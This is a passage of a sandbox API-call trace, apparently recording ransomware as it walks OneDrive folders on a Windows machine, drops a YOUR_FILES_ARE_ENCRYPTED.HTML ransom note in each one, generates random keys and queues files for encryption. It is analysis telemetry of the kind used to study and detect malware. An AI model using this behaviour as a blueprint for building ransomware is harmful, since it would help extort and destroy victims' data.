PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.319] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7550670, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7550670, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136b0, dwReserved0=0x56aafc, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.319] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.319] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0160.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ca-es-valencia\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ca-es-valencia\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.320] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.322] CloseHandle (hObject=0x5a8) returned 1 [0160.323] GetProcessHeap () returned 0x270000 [0160.324] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.324] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e90c70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e90c70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e90c70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x16d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="CollectOneDriveLogs.bat", cAlternateFileName="COLLEC~1.BAT")) returned 1 [0160.324] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat") returned 95 [0160.324] lstrcmpW (lpString1="CollectOneDriveLogs.bat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.324] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0160.324] lstrlenW (lpString=".bat") returned 4 [0160.324] PathFindExtensionW (pszPath="CollectOneDriveLogs.bat") returned=".bat" [0160.324] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\collectonedrivelogs.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.324] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5843) returned 1 [0160.325] GetProcessHeap () returned 0x270000 [0160.325] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0160.328] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="B3") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="FF") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="49") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="84") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F0") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="9C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="1F") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="A3") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="0C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="11") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1C") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="32") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="D0") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="8D") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="83") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="1E") returned 2 [0160.328] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="EE") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="86") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="F4") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="EE") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="4B") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3B") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="D4") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="9D") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="0E") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="32") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="09") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="66") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="05") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DA") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C1") returned 2 [0160.329] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="57") returned 2 [0160.330] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\CollectOneDriveLogs.bat" [0160.330] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.330] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.330] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cs", cAlternateFileName="")) returned 1 [0160.330] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs") returned 74 [0160.330] GetProcessHeap () returned 0x270000 [0160.330] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.330] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs" [0160.330] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*" [0160.330] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7550670, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.375] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.375] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.375] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.375] lstrlenW (lpString=".mui") returned 4 [0160.375] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.375] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa77196f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa77196f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x128b0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.376] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.376] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\cs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.377] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.379] CloseHandle (hObject=0x5a8) returned 1 [0160.380] GetProcessHeap () returned 0x270000 [0160.381] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.382] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="cy-gb", cAlternateFileName="")) returned 1 [0160.382] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb") returned 77 [0160.382] GetProcessHeap () returned 0x270000 [0160.382] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.382] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb" [0160.382] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*" [0160.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa77196f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.383] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.383] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.383] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.383] lstrlenW (lpString=".mui") returned 4 [0160.383] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.383] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa792ea30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa792ea30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.383] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.384] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\cy-gb\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\cy-gb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.384] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.386] CloseHandle (hObject=0x5a8) returned 1 [0160.386] GetProcessHeap () returned 0x270000 [0160.387] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.387] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="da", cAlternateFileName="")) returned 1 [0160.387] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da") returned 74 [0160.387] GetProcessHeap () returned 0x270000 [0160.387] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.387] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da" [0160.387] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*" [0160.387] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa792ea30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.389] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.389] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.389] lstrlenW (lpString=".mui") returned 4 [0160.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.389] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7ad1950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7ad1950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x124a8, dwReserved0=0x3ca792, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.389] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.391] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\da\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\da\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.394] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.396] CloseHandle (hObject=0x5a8) returned 1 [0160.397] GetProcessHeap () returned 0x270000 [0160.398] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.398] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa7ad1950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa7d0cdf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa7d0cdf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, 